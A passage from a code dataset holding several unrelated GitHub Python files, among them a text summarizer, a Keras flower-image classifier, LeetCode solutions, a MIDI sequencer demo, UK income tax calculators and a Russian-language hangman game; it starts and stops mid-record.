self.dataframe\r\n\r\n def generatingKeywords(self):\r\n self.dataframe = self.getKeywords(rowName=FULL_CONTENT, newRowName=KEYWORDS, noOfWords=20)\r\n return self.dataframe\r\n\r\n def sentToVect(self, sentToEncode):\r\n \"\"\" 512D sentence encoding using Universal Sentende Encoder \"\"\"\r\n data = {'sentToEncode': sentToEncode}\r\n headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}\r\n r = requests.post(url=self.encoderURL, params=data, headers=headers)\r\n if r.status_code == 200:\r\n output = np.asarray(ast.literal_eval(r.text)) # ast.literal_eval(r.text)\r\n else:\r\n output = np.asarray(-1)\r\n return output\r\n\r\n def writingSummaryIntoDataframe1(self, numberOfSentences=10):\r\n \"\"\"\r\n Text Summarization: Sentence Scoring based on Word Frequency\r\n \"\"\"\r\n for idx, fullContent in tqdm(self.dataframe.loc[self.dataframe[MIMETYPE] == APPLICATION_PDF][FULL_CONTENT].iteritems(),\r\n desc=\"Generating Summary1\"):\r\n if not pd.isnull(fullContent) and len(fullContent) > 0:\r\n if len(fullContent) > 0:# and idx not in [0,2]:\r\n #commonLog.log(f'======>>>>>> {idx}-->{len(fullContent)}')\r\n validSentences = sent_tokenize(fullContent)\r\n freq_table = self.createFreqTable(\" \".join(validSentences))\r\n sentence_scores = self.scoreSentences(validSentences, freq_table)\r\n threshold = self.findAverageScore(sentence_scores)\r\n summary1 = self.generateSummaryBasedOnSentenceScore(sentence_scores, 1.0 * threshold, numberOfSentences)\r\n self.dataframe.iloc[idx, self.dataframe.columns.get_loc(CONTENT_SUMMARY_1)] = summary1\r\n return self.dataframe\r\n\r\n def writingSummaryIntoDataframe2(self, numOfSentences=10, subsetSize = 500):\r\n \"\"\" Text Summarization: TextRank using Universal Sentence Encoder \"\"\"\r\n for idx, fullContent in tqdm(self.dataframe.loc[self.dataframe[MIMETYPE] == APPLICATION_PDF][FULL_CONTENT].iteritems(),\r\n desc=\"Generating Summary2\"):\r\n if not pd.isnull(fullContent) and len(fullContent) > 0:\r\n if len(fullContent) > numOfSentences:\r\n validSentences = sent_tokenize(fullContent)\r\n summary2 = []\r\n for i in range(ceil(len(validSentences)/subsetSize)):\r\n messageEmbeddings = self.sentToVect(validSentences[i*subsetSize:(i+1)*subsetSize])\r\n # generate cosine similarity matrix\r\n sim_matrix = cosine_similarity(messageEmbeddings)\r\n # create graph and generate scores from pagerank algorithms\r\n nx_graph = nx.from_numpy_array(sim_matrix)\r\n scores = nx.pagerank(nx_graph)\r\n ranked_sentences = sorted(((scores[j], s) for j, s in enumerate(validSentences[i*subsetSize:(i+1)*subsetSize])), reverse=True)\r\n summary2.append(\" \".join([i[1] for i in ranked_sentences[:numOfSentences]]))\r\n self.dataframe.iloc[idx, self.dataframe.columns.get_loc(CONTENT_SUMMARY_2)] = \" \".join(i for i in summary2)\r\n else:\r\n self.dataframe.iloc[idx, self.dataframe.columns.get_loc(CONTENT_SUMMARY_2)] = ''\r\n return self.dataframe\r\n\r\n def writingSummaryIntoDataframe3(self, numOfSentences=10):\r\n pass\r\n\r\n\r\n @staticmethod\r\n def createFreqTable(sentences):\r\n \"\"\"\r\n Finding frequency of words appeared in a text corpus\r\n \"\"\"\r\n stopwords_list = set(stopwords.words('english'))\r\n words = word_tokenize(sentences)\r\n freqTable = {}\r\n for word in words:\r\n # lemmatize word\r\n for token in spacy_nlp(word):\r\n word = token.lemma_\r\n # remove stopwords\r\n if word in stopwords_list:\r\n continue\r\n elif word in freqTable:\r\n freqTable[word] += 1\r\n else:\r\n freqTable[word] = 1\r\n key_to_remove = []\r\n for key in freqTable.keys():\r\n if len(key) == 1:\r\n key_to_remove.append(key)\r\n for key in key_to_remove:\r\n freqTable.pop(key, None)\r\n return freqTable\r\n\r\n @staticmethod\r\n def scoreSentences(sentences, freqTable):\r\n \"\"\"\r\n Calculating Ranking of the sentences from a text corpus:\r\n sentences having more frequent words will get high score\r\n \"\"\"\r\n sentenceValue = {}\r\n for sentence in sentences:\r\n sentence = re.sub(r'\\d+?', '', sentence)\r\n tempSent = ''\r\n for token in spacy_nlp(sentence):\r\n word = token.lemma_\r\n tempSent = tempSent + ' ' + word\r\n sentence = tempSent\r\n word_count_in_sentence = len(word_tokenize(sentence))\r\n for wordValue in freqTable:\r\n if wordValue.lower() in sentence.lower():\r\n if sentence in sentenceValue:\r\n sentenceValue[sentence] += freqTable[wordValue]\r\n else:\r\n sentenceValue[sentence] = freqTable[wordValue]\r\n #commonLog.log(sentence)\r\n try:\r\n #commonLog.log(f'------->>>>>{sentence}------>>>')\r\n sentenceValue[sentence] = sentenceValue[sentence] // word_count_in_sentence\r\n except KeyError:\r\n pass\r\n return sentenceValue\r\n\r\n @staticmethod\r\n def findAverageScore(sentenceValue):\r\n \"\"\" Finding average score of a sentence from a text corpus \"\"\"\r\n sumValues = 0\r\n for entry in sentenceValue:\r\n sumValues += sentenceValue[entry]\r\n average = int(sumValues/len(sentenceValue))\r\n return average\r\n\r\n @staticmethod\r\n def generateSummaryBasedOnSentenceScore(sentenceValue, threshold, numberOfSentences=10):\r\n \"\"\" Generating Summary with the sentences which are having above average sentence score \"\"\"\r\n list1 = sorted(sentenceValue.items(), key=operator.itemgetter(1), reverse=True)\r\n sentences = []\r\n for sent in list1:\r\n sentences.append(sent[0])\r\n sentence_count = 0\r\n summary = ''\r\n for sentence in sentences:\r\n tempSent = ''\r\n if sentence in sentenceValue and sentenceValue[sentence] > threshold and numberOfSentences > 0:\r\n numberOfSentences = numberOfSentences - 1\r\n summary += \" \" + sentence\r\n sentence_count += 1\r\n return summary\r\n","repo_name":"swapnanilsharma/ABLE-Batch-Process-for-Creating-Embedding-File","sub_path":"framework/summarizeData/contentSummarization.py","file_name":"contentSummarization.py","file_ext":"py","file_size_in_byte":12386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6218146102","text":"#pylint: disable=C0111,E1101\nimport os\nimport itertools\n\nimport cv2\nimport numpy as np\nimport tensorflow as tf\n\nfrom itertools import cycle\n\nimport matplotlib.pyplot as plt\n\nfrom keras.backend.tensorflow_backend import set_session\nfrom keras.callbacks import Callback\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom keras.layers.core import Dense, Dropout, Flatten\nfrom keras.models import Sequential, Model\nfrom keras.preprocessing.image import ImageDataGenerator, img_to_array\n\nfrom sklearn.metrics import f1_score, precision_score, recall_score, confusion_matrix, roc_curve, auc\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelBinarizer\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.6 #0.4 seems to work\nset_session(tf.Session(config=config))\n\nIMG_SIZE = 32\n\n# pylint: disable=\nclass MyMetrics(Callback):\n '''\n calculate some metrics during training\n taken from https://medium.com/@thongonary/how-to-compute-f1-score-for-each-epoch-in-keras-a1acd17715a2\n '''\n def __init__(self, tX=None, tY=None):\n super().__init__()\n\n self.val_f1s = []\n self.val_recalls = []\n self.val_precisions = []\n\n # https://github.com/keras-team/keras/issues/10472\n self.validation_data = (tX, tY)\n\n def on_epoch_end(self, epoch, logs=None):\n\n val_predict = (np.asarray(self.model.predict(self.validation_data[0]))).round()\n val_targ = self.validation_data[1]\n\n # https://stackoverflow.com/questions/45890328/sklearn-metrics-for-multiclass-classification\n _val_f1 = f1_score(val_targ, val_predict, average='micro')\n _val_recall = recall_score(val_targ, val_predict, average='micro')\n _val_precision = precision_score(val_targ, val_predict, average='micro')\n\n self.val_f1s.append(_val_f1)\n self.val_recalls.append(_val_recall)\n self.val_precisions.append(_val_precision)\n\n print(\" - val_f1: {:.4f} - val_precision: {:.4f} - val_recall: {:.4f}\".format(_val_f1, _val_precision, _val_recall))\n return\n\n\ndef create_model(input_shape=(32, 32, 3), n_classes=5, show=False):\n '''\n create the cNN model\n '''\n\n model = Sequential()\n model.add(Conv2D(32, (3, 3), padding='same', activation='relu', input_shape=input_shape))\n model.add(Conv2D(32, (3, 3), padding='same', activation='relu'))\n model.add(Conv2D(32, (3, 3), padding='same', activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Conv2D(32, (3, 3), padding='same', activation='relu'))\n model.add(Conv2D(32, (3, 3), padding='same', activation='relu'))\n model.add(Conv2D(32, (3, 3), padding='same', activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Dropout(0.2))\n\n model.add(Conv2D(16, (3, 3), padding='same', activation='relu'))\n model.add(Conv2D(16, (3, 3), padding='same', activation='relu'))\n model.add(Conv2D(16, (3, 3), padding='same', activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Conv2D(16, (3, 3), padding='same', activation='relu'))\n model.add(Conv2D(16, (3, 3), padding='same', activation='relu'))\n model.add(Conv2D(16, (3, 3), padding='same', activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n \n model.add(Dropout(0.2))\n\n model.add(Flatten())\n model.add(Dense(256, activation='relu'))\n model.add(Dense(256, activation='relu'))\n model.add(Dense(128, activation='relu'))\n model.add(Dense(128, activation='relu'))\n model.add(Dropout(0.2))\n\n model.add(Dense(n_classes, activation='softmax'))\n\n if show:\n model.summary()\n\n return model\n\n\ndef load_data(img_dir):\n '''\n loads and prepares the dataset\n '''\n tdata = []\n tlabels = []\n\n # traverse main dir\n for root, _, filenames in os.walk(img_dir):\n print(\"[INFO] Processing {:s}...\".format(root))\n for filename in filenames:\n # get full path to image\n img_file = os.path.join(root, filename)\n\n # prepare image\n image = cv2.imread(img_file)\n rimage = cv2.resize(image, (IMG_SIZE, IMG_SIZE), interpolation=cv2.INTER_AREA)\n rimage = img_to_array(rimage)\n tdata.append(rimage)\n\n # prepare corresponding label\n label = img_file.split(os.path.sep)[-2]\n tlabels.append(label)\n\n\n # [0-255] -> [0-1]\n tdata = np.array(tdata, dtype=\"float\") / 255.0\n tlabels = np.array(tlabels)\n\n # binarize the labels\n label_bin = LabelBinarizer()\n tlabels = label_bin.fit_transform(tlabels)\n\n np.save(\"flowers_data.npy\", tdata)\n np.save(\"flowers_labels.npy\", tlabels)\n return tdata, tlabels\n\n\ndef prepare_data(main_img_dir):\n '''\n populates data and labels \n '''\n\n if os.path.exists(\"flowers_data.npy\") and os.path.exists(\"flowers_labels.npy\"):\n\n # load numpy files (faster than always loading and resizing all images)\n print(\"[INFO] Loading dataset from numpy files...\")\n data = np.load(\"flowers_data.npy\")\n labels = np.load(\"flowers_labels.npy\")\n else:\n # load the data from specified folder\n print(\"[INFO] Loading dataset...\")\n data, labels = load_data(main_img_dir)\n\n return train_test_split(data, labels, test_size=0.2), os.listdir(main_img_dir)\n\n\ndef plot_confusion_matrix(cm, classes, normalize=False, title='ConfMatrix', cmap=plt.cm.Blues):\n \"\"\"\n prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n taken from http://scikit-learn.org/stable/auto_examples/model_selection/plot_confusion_matrix.html#sphx-glr-auto-examples-model-selection-plot-confusion-matrix-py\n \"\"\"\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n plt.savefig(\"./images/\" + title + \".pdf\")\n\n\ndef calc_rocs(y_test, y_pred, class_names):\n '''\n calculates the roc curves and auc values for all\n taken from http://scikit-learn.org/stable/auto_examples/model_selection/plot_roc.html#sphx-glr-auto-examples-model-selection-plot-roc-py\n '''\n ###################################################################################\n\n # Compute ROC curve and ROC area for each class\n fpr = dict()\n tpr = dict()\n roc_auc = dict()\n\n n_classes = len(class_names)\n\n for i in range(n_classes):\n fpr[i], tpr[i], _ = roc_curve(y_test[:, i], y_pred[:, i])\n roc_auc[i] = auc(fpr[i], tpr[i])\n\n # Compute micro-average ROC curve and ROC area\n fpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(y_test.ravel(), y_pred.ravel())\n roc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\n\n # First aggregate all false positive rates\n all_fpr = np.unique(np.concatenate([fpr[i] for i in range(n_classes)]))\n\n # Then interpolate all ROC curves at this points\n mean_tpr = np.zeros_like(all_fpr)\n for i in range(n_classes):\n mean_tpr += np.interp(all_fpr, fpr[i], tpr[i])\n\n # Finally average it and compute AUC\n mean_tpr /= n_classes\n\n # Compute macro-average ROC curve and ROC area\n fpr[\"macro\"] = all_fpr\n tpr[\"macro\"] = mean_tpr\n roc_auc[\"macro\"] = auc(fpr[\"macro\"], tpr[\"macro\"])\n\n # Plot all ROC curves\n plt.figure()\n plt.plot(fpr[\"micro\"], tpr[\"micro\"], label='micro-average ROC curve (area = {0:0.2f})'.format(roc_auc[\"micro\"]), color='red', linestyle=':', linewidth=4)\n plt.plot(fpr[\"macro\"], tpr[\"macro\"], label='macro-average ROC curve (area = {0:0.2f})'.format(roc_auc[\"macro\"]), color='blue', linestyle=':', linewidth=4)\n\n plt.plot([0, 1], [0, 1], 'k--', lw=2)\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.05])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('ROC-AUC (micro and macro average)')\n plt.legend(loc=\"lower right\")\n plt.savefig(\"./images/ROC-AUC(micro and macro average).pdf\")\n #plt.show()\n\n colors = ['aqua', 'darkorange', 'green', 'red', 'yellow']\n\n plt.figure()\n for i, color in zip(range(n_classes), colors):\n plt.plot(fpr[i], tpr[i], color=color, lw=2, label='ROC curve for {0:s} (area = {1:0.2f})'.format(class_names[i], roc_auc[i]))\n\n plt.plot([0, 1], [0, 1], 'k--', lw=2)\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.05])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('ROC-AUC (all classes)')\n plt.legend(loc=\"lower right\")\n plt.savefig(\"./images/ROC-AUC(all classes).pdf\")\n plt.show()\n\n ###################################################################################\n\n \ndef show_stats(his, metr):\n\n plt.plot(his.history['acc'])\n plt.plot(his.history['val_acc'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plt.savefig(\"./images/accuracy.pdf\")\n plt.show()\n\n plt.plot(his.history['loss'])\n plt.plot(his.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plt.savefig(\"./images/loss.pdf\")\n plt.show()\n\n plt.plot(metr.val_precisions)\n plt.plot(metr.val_recalls)\n plt.title('model precision/recall')\n plt.ylabel('precision/recall')\n plt.xlabel('epoch')\n plt.legend(['precision', 'recall'], loc='upper left')\n plt.savefig(\"./images/prec_rec.pdf\")\n plt.show()\n\n plt.plot(metr.val_f1s)\n plt.title('model f1 score')\n plt.ylabel('f1 score')\n plt.xlabel('epoch')\n plt.legend(['f1 score'], loc='upper left')\n plt.savefig(\"./images/f1score.pdf\")\n plt.show()\n\n\ndef start_main():\n\n # get data for train and test\n (x_train, x_test, y_train, y_test), class_names = prepare_data(\"./flowerOrig\")\n\n print(\"[INFO] Using {:d} samples for training and {:d} samples for testing\".format(x_train.shape[0], x_test.shape[0]))\n\n model1 = create_model(input_shape=x_train.shape[1:], n_classes=len(class_names), show=True)\n\n batch_size = 64 # smaller -> slower\n epochs = 100 # higher -> nearly always useless after some point around 100 or less\n\n print(\"[INFO] Compiling model...\")\n # loss -> categorical because mutlilabel, optimizer -> no big changes\n model1.compile(optimizer=\"rmsprop\", loss='categorical_crossentropy', metrics=['accuracy']) \n\n # construct the image generator for data augmentation\n aug = ImageDataGenerator(\n zca_whitening=False, # apply ZCA whitening\n rotation_range=180, # randomly rotate images in the range (degrees, 0 to 180)\n width_shift_range=0.1, # randomly shift images horizontally (fraction of total width)\n height_shift_range=0.1, # randomly shift images vertically (fraction of total height)\n horizontal_flip=True, # randomly flip images\n vertical_flip=True) # randomly flip images\n\n mymetrics = MyMetrics(x_test, y_test)\n\n print(\"[INFO] Training the model...\")\n history = model1.fit_generator(aug.flow(x_train, y_train, batch_size=batch_size),\n validation_data=(x_test, y_test),\n\t epochs=epochs, verbose=1, callbacks=[mymetrics])\n\n print(\"[INFO] Evaluating the model...\")\n scores = model1.evaluate(x_test, y_test, verbose=1)\n\n print(\"Accuracy: {:.4f}\".format(scores[1]))\n print(\"Precision: {:.4f}\".format(mymetrics.val_precisions[-1]))\n print(\"Recall: {:.4f}\".format(mymetrics.val_recalls[-1]))\n print(\"F1 score: {:.4f}\".format(mymetrics.val_f1s[-1]))\n\n show_stats(history, mymetrics)\n\n # confusion matrix\n y_pred = model1.predict(x_test)\n\n cnf_matrix = confusion_matrix(np.argmax(y_test, axis=1), np.argmax(y_pred, axis=1))\n\n # Plot non-normalized confusion matrix\n plt.figure()\n plot_confusion_matrix(cnf_matrix, classes=class_names,\n title='Confusion matrix without normalization')\n\n # Plot normalized confusion matrix\n plt.figure()\n plot_confusion_matrix(cnf_matrix, classes=class_names, normalize=True,\n title='Normalized confusion matrix')\n\n #plt.show()\n\n calc_rocs(y_test, y_pred, class_names)\n\n print(\"[INFO] Saving the model...\")\n model1.save(\"mymodel.dat\")\n\n print(\"[INFO] Finished!\")\n\n\nstart_main()\n","repo_name":"HeleleF/cnnProjUni","sub_path":"code/my_cnn_train.py","file_name":"my_cnn_train.py","file_ext":"py","file_size_in_byte":12865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22884753988","text":"\"\"\"\nFile: hw4_part5.py\nAuthor: Denish Pasupuleti\nDate: 9/29/19\nSection: 34\nE-mail: mpasupu1@umbc.edu\nDescription: This program will print the numbers from 1 up to a value\nsupplied by the user\n\"\"\"\nif __name__ == \"__main__\":\n start = 1\n upper_limit = int(input(\"What is the upper limit? \"))\n for i in range(start, upper_limit):\n if i % 3 == 0 and i % 4 == 0:\n print(\"This is a very special time, savor it.\")\n elif i % 3 == 0 and i % 4 != 0:\n print(\"One time I saw three hawks piled on a cactus\")\n elif i % 4 == 0 and i % 3 != 0:\n print(\"Four, What is it good for? Absolutely nothing!\")\n else:\n print(i)","repo_name":"Denish-Pasupuleti/UG_Projects","sub_path":"201-Python/Homeworks/hw4/hw4_part5.py","file_name":"hw4_part5.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39162648834","text":"from typing import List\n\n\nclass Solution:\n def removeElement(self, nums: List[int], val: int) -> int:\n count = 0\n\n for num in nums:\n if num != val:\n nums[count] = num\n count += 1\n\n return count\n\n\nif __name__ == '__main__':\n z, v = [4, 5, 5], 5\n so = Solution()\n print(so.removeElement(z, v))\n","repo_name":"BiqiangWang/leetcode","sub_path":"DataStructure/array/27.py","file_name":"27.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30552055564","text":"# --------------------------------------------------------------\n# Warp API Demo\n# (C) Michael DeHaan , 2020\n# --------------------------------------------------------------\n#\n# this demo shows how transforms work (see docs!) and how\n# to build a simple arpeggiator, as well as other MIDI effects.\n#\n# warning: as with all demos, whether these demos sound\n# musical may vary based on your chosen instruments! These are mostly\n# to illustrate concepts, and the compositions are up to you.\n\nfrom warpseq.api import demo\nfrom warpseq.api.public import Api as WarpApi\n\n# setup API and song\napi = WarpApi()\napi.song.edit(tempo=60)\n\n# setup instruments\nDEVICE = demo.suggest_device(api, 'IAC Driver IAC Bus 1')\napi.instruments.add('lead_inst', device=DEVICE, channel=1, min_octave=0, base_octave=4, max_octave=10)\n\n# setup tracks\napi.tracks.add(name='lead', instrument='lead_inst', muted=False)\n\n# setup scales\napi.scales.add(name='C-major', note='C', octave=0, scale_type='major')\napi.scales.add(name='C-minor', note='C', octave=0, scale_type='natural_minor')\n\n# setup patterns\napi.patterns.add(name='basic', slots=['1', '2', '3', '4', '5', '6', '7', '8' ])\napi.patterns.add(name='chords', slots=['I', 'IV', 'VI', 'VI', 'IV:power', '5 ch=power'])\n\n\n# setup scenes\napi.scenes.add(name='scene_1', rate=0.5, auto_advance=True)\napi.scenes.add(name='scene_2', rate=0.5, auto_advance=True)\napi.scenes.add(name='scene_3', rate=0.5, auto_advance=True)\napi.scenes.add(name='scene_4', rate=0.5, auto_advance=True)\napi.scenes.add(name='scene_5', rate=0.5, auto_advance=True)\napi.scenes.add(name='scene_6', rate=0.5, auto_advance=True)\napi.scenes.add(name='scene_7', rate=0.5, auto_advance=True)\napi.scenes.add(name='scene_8', rate=0.5, auto_advance=True)\napi.scenes.add(name='scene_9', rate=0.5, auto_advance=True)\napi.scenes.add(name='scene_10', rate=0.5, auto_advance=True)\napi.scenes.add(name='scene_END', rate=0.5, auto_advance=True)\n\n# setup transforms\n# arpeggiate chords only - auto-divide chords regardless of length so each 1/16 note plays each note in the chord. Triads will strum faster than power chords, etc.\napi.transforms.add(name='basic arp', slots=['1'], divide=3, applies_to='chords')\n# play two copies of the chord, the second one octave up\napi.transforms.add(name='octave arp', slots=['1','1','1','O+1','O+1','O+1'], divide=3)\n# play each note in a triad with diminished velocity (this might not be audible, depending on your synth settings)\napi.transforms.add(name='velocity arp', slots=['1 v=120','1 v=100','1 v=80'], divide=3)\n# play each note in a triad with different MIDI CC values for MIDI CC 1\napi.transforms.add(name='midi cc arp', slots=['1 cc1=80', '1 cc1=100', '1 cc1=20:100'], divide=3)\n# take the base note of a pattern and then play it faster, shifting the scale notes to form a bassline\napi.transforms.add(name='bassline', slots=['1','S+4','S+5','S+2','S+4','S+5','1'], divide=5)\n# play the second note of a triad or pattern one note up, the second two notes up\napi.transforms.add(name='octave ramp', slots=['1','O+1','O+2'], divide=1)\n# quickly repeat the notes with alternating silence, the last repeat is only randomly silent\napi.transforms.add(name='stutter', slots=['1','x','1','x','1','p=0.5 x'], divide=6, applies_to='notes')\n# turn whatever is playing into chords, or change the active chord type\napi.transforms.add(name='chordify', slots=['ch=major', 'ch=minor'])\n\n# setup clips\napi.clips.add(name='chord strum', scene='scene_1', track='lead', scales=['C-major'], patterns=['chords'], transforms=['basic arp'], repeat=1, auto_scene_advance=True)\napi.clips.add(name='chord octaves', scene='scene_2', track='lead', scales=['C-major'], patterns=['chords'], transforms=['octave arp'], repeat=1, auto_scene_advance=True)\napi.clips.add(name='chord velocity', scene='scene_3', track='lead', scales=['C-major'], patterns=['chords'], transforms=['velocity arp'], repeat=1, auto_scene_advance=True)\napi.clips.add(name='chord ccs', scene='scene_4', track='lead', scales=['C-major'], patterns=['chords'], transforms=['midi cc arp'], repeat=1, auto_scene_advance=True)\napi.clips.add(name='melody to bassline', scene='scene_5', track='lead', scales=['C-major'], patterns=['basic'], transforms=['bassline'], repeat=1, auto_scene_advance=True)\n\n# the transforms can be expressed in a list, the next item in the transform list will be chosen as the patterns advance and repeat\n# if any item in the list IS a list, both of those transforms will be applied in order against the currently playing pattern\napi.clips.add(name='melody octave adjustment, then stutter', scene='scene_6', track='lead', scales=['C-major'], patterns=['basic'], transforms=['octave ramp', 'stutter'], repeat=2, auto_scene_advance=True)\napi.clips.add(name='stacked transforms', scene='scene_7', track='lead', scales=['C-major'], patterns=['basic'], transforms=[['octave ramp','stutter'],'bassline',['octave arp','basic arp']], repeat=3, auto_scene_advance=True)\napi.clips.add(name='just arp the chords', scene='scene_8', track='lead', scales=['C-major'], patterns=['chords','basic'], transforms=['basic arp'], repeat=1, auto_scene_advance=True)\napi.clips.add(name='just tweak the notes', scene='scene_9', track='lead', scales=['C-major'], patterns=['chords','basic'], transforms=['stutter'], repeat=1, auto_scene_advance=True)\napi.clips.add(name='transform melody to chords then arp', scene='scene_10', track='lead', scales=['C-major'], patterns=['basic'], transforms=[['chordify','basic arp']], repeat=1, auto_scene_advance=True)\n\n# play starting on the first scene - Ctrl+C to exit.\napi.player.loop('scene_1')\n","repo_name":"simianterminal/warpseq","sub_path":"examples/api/04_transforms.py","file_name":"04_transforms.py","file_ext":"py","file_size_in_byte":5625,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"7617962915","text":"import numpy as np\n\ndef calculate_tax_rates(x,bands,maxAllowance=123000):\n \n taxBands = np.diff([0] + [k[0] for k in bands])\n taxRates = np.array([k[1] for k in bands])\n \n # tapering personal allowance\n taperedPA = np.max([0,x-maxAllowance])\n adjustedPA = taxBands[0] - taperedPA/2\n taxBands[0] = np.max([0,adjustedPA])\n \n payInBand = np.zeros(len(bands))\n remaining = x\n for i,band in enumerate(taxBands):\n \n inBand = remaining if band > remaining else band\n remaining -= inBand\n \n payInBand[i] = inBand\n \n if remaining == 0:\n break\n \n \n if x > maxAllowance:\n taxRates[0] = taxRates[1]\n \n totalTaxes = taxRates.dot(payInBand)\n \n return totalTaxes\n\ndef scotland_2018(x):\n band0 = (11850,0.0) # personal allowance\n band1 = (13850,0.19)\n band2 = (24000,0.2)\n band3 = (44273,0.21)\n band4 = (150000,0.41)\n band5 = (np.inf,0.46)\n \n bands = [band0,band1,band2,band3,band4,band5]\n return calculate_tax_rates(x,bands)\n\ndef scotland_2017(x):\n band0 = [11500,0.0]\n band1 = [43000,0.2]\n band2 = [150000,0.4]\n band3 = [np.inf,0.45]\n\n bands = [band0,band1,band2,band3]\n\n return calculate_tax_rates(x,bands)\n\ndef ruk_2018(x):\n band0 = [11850,0.0] # personal allowance\n band1 = [46350,0.2]\n band2 = [150000,0.4]\n band3 = [np.inf,0.45]\n \n bands = [band0,band1,band2,band3]\n return calculate_tax_rates(x,bands)\n\ndef ruk_2017(x):\n band0 = [11500,0.0]\n band1 = [45000,0.2]\n band2 = [150000,0.4]\n band3 = [np.inf,0.45]\n \n bands = [band0,band1,band2,band3]\n return calculate_tax_rates(x,bands)\n\ndef national_insurance(x):\n band0 = [8164,0.0]\n band1 = [45032,0.12]\n band2 = [np.inf,0.02]\n\n bands = [band0,band1,band2]\n return calculate_tax_rates(x,bands)\n","repo_name":"sidhenriksen/taxcalc","sub_path":"tax.py","file_name":"tax.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6222477039","text":"class Solution:\n # @param s, a string\n # @return an integer\n def numDecodings(self, s):\n n = len(s)\n if n == 0:\n return 0\n dp = [ 0 for i in range(n + 1) ]\n dp[0] = 1\n for i in range(1, n + 1):\n if i == 1:\n dp[i] = 1 if int(s[0]) >= 1 else 0\n continue\n if str(int(s[i-2:i])) == s[i-2:i] and int(s[i-2:i]) <= 26:\n dp[i] += dp[i-2]\n if int(s[i-1:i]) >= 1:\n dp[i] += dp[i-1]\n return dp[n]","repo_name":"Shuaiyicao/leetcode-python","sub_path":"91.py","file_name":"91.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26766138855","text":"import urllib.request\nimport os\n\ndef cls():\n\tos.system('cls' if os.name=='nt' else 'clear')\n\ndef main_menu () :\n\tplay=1\n\twhile play>0:\n\t\tprint(\"\"\"Добро пожаловать в игру \"\"Виселица\"\"!\\n Пожалуйста, выберите нужный пункт меню:\n\t\t1) Новая игра\n\t\t2) Настройки\n\t\t3) Выход\"\"\",\"\\n \")\n\tmode=input(\"Ваш выбор: \")\n\tif mode==\"1\":\n\t import viselica\n\telif mode==\"2\":\n\t print(\"Меню настроек:\\n#пока находится в тестовом режиме#\\n \")\n\telse:\n\t play=0\n\t print(\"Спасибо что зашли на огонек! Досвидания\")\n\ndef drow_word (secret_word, user_letters ):\n\tword_to_drow = []\n\tfor letter in secret_word :\n\t\tif letter in user_letters :\n\t\t\tword_to_drow.append(letter)\n\t\telse :\n\t\t\tword_to_drow.append(\"_\")\n\treturn ''.join(word_to_drow)\n\ndef main():\n\tslovo = urllib.request.urlopen(\"http://www.setgetgo.com/randomword/get.php?q=4\").read().decode(\"utf-8\").lower()\n\tprint(slovo)\n\tt=7\n\tm=1\n\ti=0\n\tlet=''\n\tspace=(' ')\n\tprint (drow_word(slovo, let))\n\twhile t>0:\n\t\tprint('\\nу вас ',t,' попыток') \n\t\tlet1=input('введите букву: ')\n\t\tif slovo.find(let1)!=-1 and len(let1)==1 and let1.isdigit()==False and let.find(let1)==-1:\n\t\t\tcls()\n\t\t\tprint(drow_word(slovo, let + let1))\n\t\telif let1.isdigit()==True or len(let1)!=1:\n\t\t\tprint(\"Мы играем в слова! Попробуйте ввести одну букву снова.\")\n\t\telif let.find(let1)>-1:\n\t\t\tprint('Вы уже выбирали эту букву. Попробуйте другую.')\n\t\telse:\n\t\t\tt-=1\n\t\t\tprint('НЕ УГАДАЛ!! Попытайся еще!')\n\t\tlet=let + let1\n\t\tif set(let).intersection(set(slovo)) == set(slovo):\n\t\t\tprint(\"Поздравляем! Вы выиграли, и на этот раз виселится останется без работы =(\")\n\t\t\tbreak\n\telse:\n\t\tprint(\"Вы проиграли!\")\n\t\tprint(\"Ответ был: \",slovo,'\\n')\n\tch=input(\"Хотели бы вы сыграть еще 